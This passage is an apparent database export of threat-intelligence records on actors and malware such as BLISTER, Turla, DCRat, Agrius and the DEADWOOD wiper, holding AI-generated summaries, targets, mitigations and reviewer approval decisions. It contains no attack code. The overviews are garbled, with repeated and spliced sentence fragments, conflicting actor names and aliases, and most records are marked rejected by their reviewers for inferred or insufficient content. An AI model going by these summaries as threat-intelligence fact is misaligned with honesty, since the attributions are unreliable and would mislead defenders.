IDs\", \" payment records\", \" and salary information from the breached servers of a Colombian cooperative bank.\"], \"vulnerabilities\": [], \"sources\": [\"Qualys\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-28T20:28:34.689Z"
  },
  "approval_message": "Too much inferred information. Try rerunning.",
  "change_log": [
    {
      "_id": {
        "$oid": "6509f2245e86192e8872416b"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-19T19:10:28.099Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "APT36",
          "updated_value": "BitRAT"
        }
      ]
    }
  ],
  "threat_actor": "BitRAT"
},
{
  "_id": {
    "$oid": "6509f8893487129a478430fd"
  },
  "report": {
    "$oid": "6509f85f5e86192e8872416c"
  },
  "threat_actor_overview": "BLISTER is a malware loader associated with financially-motivated intrusions. It was initially discovered by Elastic Security Labs in 2021 and continues to develop additional capabilities. It uses a distinctive technique of embedding malicious code in otherwise legitimate applications,  which appears successful given the low rates of detection for many vendors., BLISTER is a malware loader initially discovered by Elastic Security Labs in 2021 and associated with financially-motivated intrusions. It continues to develop additional capabilities and remains a significant concern due to its tenacity and adaptability.,  which appears successful given the low rates of detection for many vendors. The malware authors continue to update BLISTER,  adding new features and techniques to evade detection., BLISTER is a malware loader initially discovered by Elastic Security Labs in 2021 and associated with financially-motivated intrusions. It continues to develop additional capabilities and remains under the radar,  posing an emerging threat.",
  "aliases": [],
  "sources": [
    "Elastic Security Labs",
    "Palo Altos Unit 42"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "individual",
    "organization"
  ],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"BLISTER\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"BLISTER is a malware loader associated with financially-motivated intrusions. It was initially discovered by Elastic Security Labs in 2021 and continues to develop additional capabilities. It uses a distinctive technique of embedding malicious code in otherwise legitimate applications,  which appears successful given the low rates of detection for many vendors., BLISTER is a malware loader initially discovered by Elastic Security Labs in 2021 and associated with financially-motivated intrusions. It continues to develop additional capabilities and remains a significant concern due to its tenacity and adaptability.,  which appears successful given the low rates of detection for many vendors. The malware authors continue to update BLISTER,  adding new features and techniques to evade detection., BLISTER is a malware loader initially discovered by Elastic Security Labs in 2021 and associated with financially-motivated intrusions. It continues to develop additional capabilities and remains under the radar,  posing an emerging threat.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\"], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\", \"organization\"], \"threat_actor_type\": [\"criminal\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Elastic Security Labs\", \"Palo Altos Unit 42\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"BLISTER\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"BLISTER is a malware loader associated with financially-motivated intrusions. It was initially discovered by Elastic Security Labs in 2021 and continues to develop additional capabilities. It uses a distinctive technique of embedding malicious code in otherwise legitimate applications\", \" which appears successful given the low rates of detection for many vendors.\", \"BLISTER is a malware loader initially discovered by Elastic Security Labs in 2021 and associated with financially-motivated intrusions. It continues to develop additional capabilities and remains a significant concern due to its tenacity and adaptability.\", \" which appears successful given the low rates of detection for many vendors. The malware authors continue to update BLISTER\", \" adding new features and techniques to evade detection.\", \"BLISTER is a malware loader initially discovered by Elastic Security Labs in 2021 and associated with financially-motivated intrusions. It continues to develop additional capabilities and remains under the radar\", \" posing an emerging threat.\"], \"target_populations\": [], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\", \"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"criminal\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"Elastic Security Labs\", \"Palo Altos Unit 42\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-28T20:37:53.230Z"
  },
  "approval_message": "Rerun",
  "change_log": [],
  "threat_actor": "BLISTER"
},
{
  "_id": {
    "$oid": "650a05e990fd2bec23ee8dc9"
  },
  "report": {
    "$oid": "650a05c781da25acaed6fff0"
  },
  "threat_actor_overview": "The Turla APT,  also known as COMPFun and Reductor,  is a threat actor that was first documented in 2014. It is known for its innovative approaches,  such as bypassing TLS encrypted traffic via PRNG system function patching and implementing C2 communications using uncommon HTTP status codes. The malware operators focus on diplomatic entities and use a visa-related application as the initial infection vector.,  is a threat actor that has been active since at least 2014. It is known for its innovative approaches,  such as bypassing TLS encrypted traffic via PRNG system function patching and implementing C2 communications using uncommon HTTP status codes. The threat actor primarily targets diplomatic entities.,  is a threat actor that has been active since at least 2014. They are known for their innovative approaches,  also known as COMpfun and Reductor,  is a threat actor that was initially documented by G-DATA in 2014. The actor is known for its innovative approaches,  such as bypassing TLS encrypted traffic via PRNG system function patching and implementing C2 communications using uncommon HTTP status codes. The malware operators have a focus on diplomatic entities and have used a visa-related application as an initial infection vector.",
  "aliases": [
    "COMPFun",
    "Reductor",
    "COMpfun"
  ],
  "sources": [
    "G-DATA",
    "Kaspersky"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Espionage"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Disruption of Service",
    "Espionage"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "organization",
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "EU"
  ],
  "target_regions": [
    "europe"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Turla APT\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The Turla APT,  also known as COMPFun and Reductor,  is a threat actor that was first documented in 2014. It is known for its innovative approaches,  such as bypassing TLS encrypted traffic via PRNG system function patching and implementing C2 communications using uncommon HTTP status codes. The malware operators focus on diplomatic entities and use a visa-related application as the initial infection vector.,  is a threat actor that has been active since at least 2014. It is known for its innovative approaches,  such as bypassing TLS encrypted traffic via PRNG system function patching and implementing C2 communications using uncommon HTTP status codes. The threat actor primarily targets diplomatic entities.,  is a threat actor that has been active since at least 2014. They are known for their innovative approaches,  also known as COMpfun and Reductor,  is a threat actor that was initially documented by G-DATA in 2014. The actor is known for its innovative approaches,  such as bypassing TLS encrypted traffic via PRNG system function patching and implementing C2 communications using uncommon HTTP status codes. The malware operators have a focus on diplomatic entities and have used a visa-related application as an initial infection vector.\", \"target_countries\": [\"EU\"], \"target_regions\": [\"europe\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\", \"Espionage\"], \"target_industry_sectors\": [\"government-public-services\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"organization\", \"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"COMPFun\", \"Reductor\", \"COMpfun\"], \"vulnerabilities\": [], \"sources\": [\"G-DATA\", \"Kaspersky\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Turla APT\"], \"aliases\": [\"COMPFun\", \"Reductor\", \"COMpfun\"], \"country_of_origin\": [], \"target_countries\": [\"EU\"], \"target_regions\": [\"europe\"], \"threat_actor_overview\": [\"The Turla APT\", \" also known as COMPFun and Reductor\", \" is a threat actor that was first documented in 2014. It is known for its innovative approaches\", \" such as bypassing TLS encrypted traffic via PRNG system function patching and implementing C2 communications using uncommon HTTP status codes. The malware operators focus on diplomatic entities and use a visa-related application as the initial infection vector.\", \" is a threat actor that has been active since at least 2014. It is known for its innovative approaches\", \" such as bypassing TLS encrypted traffic via PRNG system function patching and implementing C2 communications using uncommon HTTP status codes. The threat actor primarily targets diplomatic entities.\", \" is a threat actor that has been active since at least 2014. They are known for their innovative approaches\", \" also known as COMpfun and Reductor\", \" is a threat actor that was initially documented by G-DATA in 2014. The actor is known for its innovative approaches\", \" such as bypassing TLS encrypted traffic via PRNG system function patching and implementing C2 communications using uncommon HTTP status codes. The malware operators have a focus on diplomatic entities and have used a visa-related application as an initial infection vector.\"], \"target_populations\": [], \"target_industry_sectors\": [\"government-public-services\"], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\", \"Espionage\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"organization\", \"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"G-DATA\", \"Kaspersky\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-28T20:39:15.064Z"
  },
  "approval_message": "Rerun",
  "change_log": [
    {
      "_id": {
        "$oid": "650a064b81da25acaed6fff1"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-19T20:36:27.017Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Turla APT",
          "updated_value": "COMPfun"
        }
      ]
    }
  ],
  "threat_actor": "COMPfun"
},
{
  "_id": {
    "$oid": "650b051c9773f648b14f447e"
  },
  "report": {
    "$oid": "650b04ebaa013481ea3bf4c4"
  },
  "threat_actor_overview": "The threat actor is a sole Russian developer who created a low-cost variant of the malware known as the Dark Crystal RAT (aka DCRat). The malware platform has become popular with entry-level hackers but has many of the features of better-known programs. The malware may only be a niche threat,  but the development of new attack tools highlights the fact that companies need to be vigilant., The threat actor is a sole Russian developer who created a low-cost variant of the malware known as the Dark Crystal RAT (aka DCRat). The malware platform has become popular with entry-level hackers but has many of the features of better-known programs. The malware is being improved and maintained daily,  suggesting that it's a full-time project for the developer., The threat actor is believed to be a sole Russian developer who created a low-cost variant of the malware known as the Dark Crystal RAT (DCRat). The malware platform has become popular with entry-level hackers and has many of the features of better-known programs. The malware is being improved and maintained daily",
  "aliases": [
    "Dark Crystal RAT",
    "DCRat"
  ],
  "sources": [
    "BlackBerry",
    "Mandiant",
    "eSentire",
    "Eclypsium",
    "Splunk"
  ],
  "country_of_origin": "RU",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "individual"
  ],
  "threat_actor_type": [
    "criminal",
    "hacker"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "Companies should make sure that their end users are trained on spotting and reporting suspicious emails and that multifactor authentication is deployed., End users should be trained on spotting and reporting suspicious emails, Multifactor authentication should be deployed, End users should be trained on spotting and reporting suspicious emails and multifactor authentication should be deployed.",
  "attack_consequences": "Information Theft, Financial Theft",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Unknown\", \"country_of_origin\": \"RU\", \"attack_mitigations\": \"Companies should make sure that their end users are trained on spotting and reporting suspicious emails and that multifactor authentication is deployed., End users should be trained on spotting and reporting suspicious emails, Multifactor authentication should be deployed, End users should be trained on spotting and reporting suspicious emails and multifactor authentication should be deployed.\", \"attack_consequences\": \"Information Theft, Financial Theft\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The threat actor is a sole Russian developer who created a low-cost variant of the malware known as the Dark Crystal RAT (aka DCRat). The malware platform has become popular with entry-level hackers but has many of the features of better-known programs. The malware may only be a niche threat,  but the development of new attack tools highlights the fact that companies need to be vigilant., The threat actor is a sole Russian developer who created a low-cost variant of the malware known as the Dark Crystal RAT (aka DCRat). The malware platform has become popular with entry-level hackers but has many of the features of better-known programs. The malware is being improved and maintained daily,  suggesting that it's a full-time project for the developer., The threat actor is believed to be a sole Russian developer who created a low-cost variant of the malware known as the Dark Crystal RAT (DCRat). The malware platform has become popular with entry-level hackers and has many of the features of better-known programs. The malware is being improved and maintained daily\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_type\": [\"criminal\", \"hacker\"], \"aliases\": [\"Dark Crystal RAT\", \"DCRat\"], \"vulnerabilities\": [], \"sources\": [\"BlackBerry\", \"Mandiant\", \"eSentire\", \"Eclypsium\", \"Splunk\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Unknown\"], \"aliases\": [\"Dark Crystal RAT\", \"DCRat\"], \"country_of_origin\": [\"RU\"], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"The threat actor is a sole Russian developer who created a low-cost variant of the malware known as the Dark Crystal RAT (aka DCRat). The malware platform has become popular with entry-level hackers but has many of the features of better-known programs. The malware may only be a niche threat\", \" but the development of new attack tools highlights the fact that companies need to be vigilant.\", \"The threat actor is a sole Russian developer who created a low-cost variant of the malware known as the Dark Crystal RAT (aka DCRat). The malware platform has become popular with entry-level hackers but has many of the features of better-known programs. The malware is being improved and maintained daily\", \" suggesting that it's a full-time project for the developer.\", \"The threat actor is believed to be a sole Russian developer who created a low-cost variant of the malware known as the Dark Crystal RAT (DCRat). The malware platform has become popular with entry-level hackers and has many of the features of better-known programs. The malware is being improved and maintained daily\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_sophistication\": [\"intermediate\"], \"threat_actor_type\": [\"criminal\", \"hacker\"], \"attack_mitigations\": [\"Companies should make sure that their end users are trained on spotting and reporting suspicious emails and that multifactor authentication is deployed.\", \"End users should be trained on spotting and reporting suspicious emails\", \"Multifactor authentication should be deployed\", \"End users should be trained on spotting and reporting suspicious emails and multifactor authentication should be deployed.\"], \"attack_consequences\": [\"Information Theft\", \"Financial Theft\"], \"vulnerabilities\": [], \"sources\": [\"BlackBerry\", \"Mandiant\", \"eSentire\", \"Eclypsium\", \"Splunk\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-28T21:56:54.386Z"
  },
  "approval_message": "rerun",
  "change_log": [
    {
      "_id": {
        "$oid": "65130f8dfb98828071a98b2c"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-26T17:06:21.705Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Unknown",
          "updated_value": "DCRat"
        }
      ]
    }
  ],
  "threat_actor": "DCRat"
},
{
  "_id": {
    "$oid": "650b2e8247226591a0b65bab"
  },
  "report": {
    "$oid": "650b2e560e27f4aa83e4beee"
  },
  "threat_actor_overview": "Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for its disruptive attacks,  primarily targeting Israeli organizations. It uses a variety of tools,  including the Apostle and Deadwood disk-wiping malware,  and the IPSec Helper backdoor. The group has recently started using a new ransomware called Moneybird., Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for deploying wiper attacks and ransomware against Israeli targets. They have also targeted a critical facility in the United Arab Emirates and a target in Saudi Arabia. The group uses malware such as Apostle and IPSec Helper,  and webshells for lateral movement inside a compromised network., Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. It is known for deploying wiper attacks and ransomware against Israeli targets. The group has also targeted a critical facility in the United Arab Emirates and a target in Saudi Arabia. The group uses malware called Apostle,  which initially was a disk wiper but later evolved into full-fledged ransomware. The group also uses a backdoor called IPSec Helper and webshells for lateral movement inside a compromised network., Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for deploying wiper attacks and ransomware against Israeli targets. They have also targeted the United Arab Emirates and Saudi Arabia. The group uses malware such as Apostle and Deadwood,  and a backdoor called IPSec Helper. They have recently started using a new ransomware called Moneybird., Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for deploying wiper attacks and ransomware against its targets. It has used malware such as Apostle and Deadwood,  and a backdoor called IPSec Helper. The group has shown an ability to develop and adapt its tools,  as seen in the evolution of Apostle from a flawed disk wiper to a fully operational ransomware.",
  "aliases": [
    "BlackShadow",
    "Moneybird"
  ],
  "sources": [
    "SentinelOne",
    "Check Point",
    "Microsoft Threat Intelligence"
  ],
  "country_of_origin": "IR",
  "threat_actor_motives": [],
  "threat_actor_intent": [
    "Disruption of Service",
    "Damage and Destruction"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "IL",
    "AE",
    "SA"
  ],
  "target_regions": [
    "middle-east"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--8dcb5c72-0dc9-47dd-a5d3-7498cee712cb",
    "x-industry-sector--532c8286-2c6e-4ad3-8ffd-6d2d49f1b757"
  ],
  "attack_mitigations": "Evaluate all email attachments before opening, Train staff on social engineering attacks, Keep software updated, Evaluate all attachments before opening",
  "attack_consequences": "Data destruction, Disruption of operations, Disruption",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Agrius\", \"country_of_origin\": \"IR\", \"attack_mitigations\": \"Evaluate all email attachments before opening, Train staff on social engineering attacks, Keep software updated, Evaluate all attachments before opening\", \"attack_consequences\": \"Data destruction, Disruption of operations, Disruption\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for its disruptive attacks,  primarily targeting Israeli organizations. It uses a variety of tools,  including the Apostle and Deadwood disk-wiping malware,  and the IPSec Helper backdoor. The group has recently started using a new ransomware called Moneybird., Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for deploying wiper attacks and ransomware against Israeli targets. They have also targeted a critical facility in the United Arab Emirates and a target in Saudi Arabia. The group uses malware such as Apostle and IPSec Helper,  and webshells for lateral movement inside a compromised network., Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. It is known for deploying wiper attacks and ransomware against Israeli targets. The group has also targeted a critical facility in the United Arab Emirates and a target in Saudi Arabia. The group uses malware called Apostle,  which initially was a disk wiper but later evolved into full-fledged ransomware. The group also uses a backdoor called IPSec Helper and webshells for lateral movement inside a compromised network., Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for deploying wiper attacks and ransomware against Israeli targets. They have also targeted the United Arab Emirates and Saudi Arabia. The group uses malware such as Apostle and Deadwood,  and a backdoor called IPSec Helper. They have recently started using a new ransomware called Moneybird., Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for deploying wiper attacks and ransomware against its targets. It has used malware such as Apostle and Deadwood,  and a backdoor called IPSec Helper. The group has shown an ability to develop and adapt its tools,  as seen in the evolution of Apostle from a flawed disk wiper to a fully operational ransomware.\", \"target_countries\": [\"IL\", \"AE\", \"SA\"], \"target_regions\": [\"middle-east\"], \"target_populations\": [], \"threat_actor_intent\": [\"Disruption of Service\", \"Damage and Destruction\"], \"target_industry_sectors\": [\"insurance\", \"education\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"BlackShadow\", \"Moneybird\"], \"vulnerabilities\": [], \"sources\": [\"SentinelOne\", \"Check Point\", \"Microsoft Threat Intelligence\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Agrius\"], \"aliases\": [\"BlackShadow\", \"Moneybird\"], \"country_of_origin\": [\"IR\"], \"target_countries\": [\"IL\", \"AE\", \"SA\"], \"target_regions\": [\"middle-east\"], \"threat_actor_overview\": [\"Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for its disruptive attacks\", \" primarily targeting Israeli organizations. It uses a variety of tools\", \" including the Apostle and Deadwood disk-wiping malware\", \" and the IPSec Helper backdoor. The group has recently started using a new ransomware called Moneybird.\", \"Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for deploying wiper attacks and ransomware against Israeli targets. They have also targeted a critical facility in the United Arab Emirates and a target in Saudi Arabia. The group uses malware such as Apostle and IPSec Helper\", \" and webshells for lateral movement inside a compromised network.\", \"Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. It is known for deploying wiper attacks and ransomware against Israeli targets. The group has also targeted a critical facility in the United Arab Emirates and a target in Saudi Arabia. The group uses malware called Apostle\", \" which initially was a disk wiper but later evolved into full-fledged ransomware. The group also uses a backdoor called IPSec Helper and webshells for lateral movement inside a compromised network.\", \"Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for deploying wiper attacks and ransomware against Israeli targets. They have also targeted the United Arab Emirates and Saudi Arabia. The group uses malware such as Apostle and Deadwood\", \" and a backdoor called IPSec Helper. They have recently started using a new ransomware called Moneybird.\", \"Agrius is an Iran-linked advanced persistent threat group that has been active since 2020. The group is known for deploying wiper attacks and ransomware against its targets. It has used malware such as Apostle and Deadwood\", \" and a backdoor called IPSec Helper. The group has shown an ability to develop and adapt its tools\", \" as seen in the evolution of Apostle from a flawed disk wiper to a fully operational ransomware.\"], \"target_populations\": [], \"target_industry_sectors\": [\"insurance\", \"education\"], \"threat_actor_intent\": [\"Disruption of Service\", \"Damage and Destruction\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Disruption of Service\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [\"Evaluate all email attachments before opening\", \"Train staff on social engineering attacks\", \"Keep software updated\", \"Evaluate all attachments before opening\"], \"attack_consequences\": [\"Data destruction\", \"Disruption of operations\", \"Disruption\"], \"vulnerabilities\": [], \"sources\": [\"SentinelOne\", \"Check Point\", \"Microsoft Threat Intelligence\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-10-02T19:01:02.136Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "650b4d2329c38b96bdcaafa5"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-20T19:50:59.257Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Agrius",
          "updated_value": "Apostle"
        }
      ]
    }
  ],
  "threat_actor": "Apostle"
},
{
  "_id": {
    "$oid": "650b4d616b54beacc3a9e520"
  },
  "report": {
    "$oid": "650b4d3d29c38b96bdcaafa6"
  },
  "threat_actor_overview": "Agrius is a newer Iran-aligned group targeting victims in Israel and the United Arab Emirates since 2020. Agrius exploits known vulnerabilities in internet-facing applications to install webshells,  then conducts internal reconnaissance before moving laterally and then deploying its malicious payloads.",
  "aliases": [],
  "sources": [
    "ESET"
  ],
  "country_of_origin": "IR",
  "threat_actor_motives": [],
  "threat_actor_intent": [
    "Disruption of Service",
    "Credential Harvesting"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "HK",
    "IL",
    "ZA"
  ],
  "target_regions": [
    "asia",
    "middle-east",
    "southern-africa",
    "africa"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Agrius\", \"country_of_origin\": \"IR\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Agrius is a newer Iran-aligned group targeting victims in Israel and the United Arab Emirates since 2020. Agrius exploits known vulnerabilities in internet-facing applications to install webshells,  then conducts internal reconnaissance before moving laterally and then deploying its malicious payloads.\", \"target_countries\": [\"HK\", \"IL\", \"ZA\"], \"target_regions\": [\"asia\", \"middle-east\", \"southern-africa\", \"africa\"], \"target_populations\": [], \"threat_actor_intent\": [\"Disruption of Service\", \"Credential Harvesting\"], \"target_industry_sectors\": [\"technology\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"ESET\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Agrius\"], \"aliases\": [], \"country_of_origin\": [\"IR\"], \"target_countries\": [\"HK\", \"IL\", \"ZA\"], \"target_regions\": [\"asia\", \"middle-east\", \"southern-africa\", \"africa\"], \"threat_actor_overview\": [\"Agrius is a newer Iran-aligned group targeting victims in Israel and the United Arab Emirates since 2020. Agrius exploits known vulnerabilities in internet-facing applications to install webshells\", \" then conducts internal reconnaissance before moving laterally and then deploying its malicious payloads.\"], \"target_populations\": [], \"target_industry_sectors\": [\"technology\"], \"threat_actor_intent\": [\"Disruption of Service\", \"Credential Harvesting\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"ESET\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-10-02T19:03:07.625Z"
  },
  "approval_message": "Needs more detail",
  "change_log": [],
  "threat_actor": "Agrius"
},
{
  "_id": {
    "$oid": "650b5cf9356057df44b73436"
  },
  "report": {
    "$oid": "650b5cc454d5ba1acf505859"
  },
  "threat_actor_overview": "Agrius is a threat actor that utilized DEADWOOD (aka Detbosit),  a wiper malware written in C++ using the Boost libraries. This wiper was involved in a wiping attack in Saudi Arabia in 2019. The malware operates based on a configuration file,  which lists which functionalities to execute. The malware attempts to overwrite files using random data,  making it look like ransomware. However,  unlike ransomware,  data wiped by DEADWOOD can not be recovered by the threat actor.,  which lists which functionalities to execute. The configuration file for newer DEADWOOD samples is embedded within the executable as a resource named METADATA,  encrypted using AES.,  making it look like ransomware,  but unlike ransomware",
  "aliases": [
    "DEADWOOD",
    "Detbosit"
  ],
  "sources": [],
  "country_of_origin": "",
  "threat_actor_motives": [],
  "threat_actor_intent": [
    "Damage and Destruction"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [],
  "threat_actor_type": [],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "SA"
  ],
  "target_regions": [
    "middle-east"
  ],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "",
  "attack_consequences": "The impact of the malware might actually look like ransomware,  as random data is written over the original content of the files without deleting them. Unlike ransomware,  however,  data wiped by DEADWOOD can not be recovered by the threat actor (it can only be restored from a previous backup,  if one exists)",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Agrius\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"The impact of the malware might actually look like ransomware,  as random data is written over the original content of the files without deleting them. Unlike ransomware,  however,  data wiped by DEADWOOD can not be recovered by the threat actor (it can only be restored from a previous backup,  if one exists)\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Agrius is a threat actor that utilized DEADWOOD (aka Detbosit),  a wiper malware written in C++ using the Boost libraries. This wiper was involved in a wiping attack in Saudi Arabia in 2019. The malware operates based on a configuration file,  which lists which functionalities to execute. The malware attempts to overwrite files using random data,  making it look like ransomware. However,  unlike ransomware,  data wiped by DEADWOOD can not be recovered by the threat actor.,  which lists which functionalities to execute. The configuration file for newer DEADWOOD samples is embedded within the executable as a resource named METADATA,  encrypted using AES.,  making it look like ransomware,  but unlike ransomware\", \"target_countries\": [\"SA\"], \"target_regions\": [\"middle-east\"], \"target_populations\": [], \"threat_actor_intent\": [\"Damage and Destruction\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_type\": [], \"aliases\": [\"DEADWOOD\", 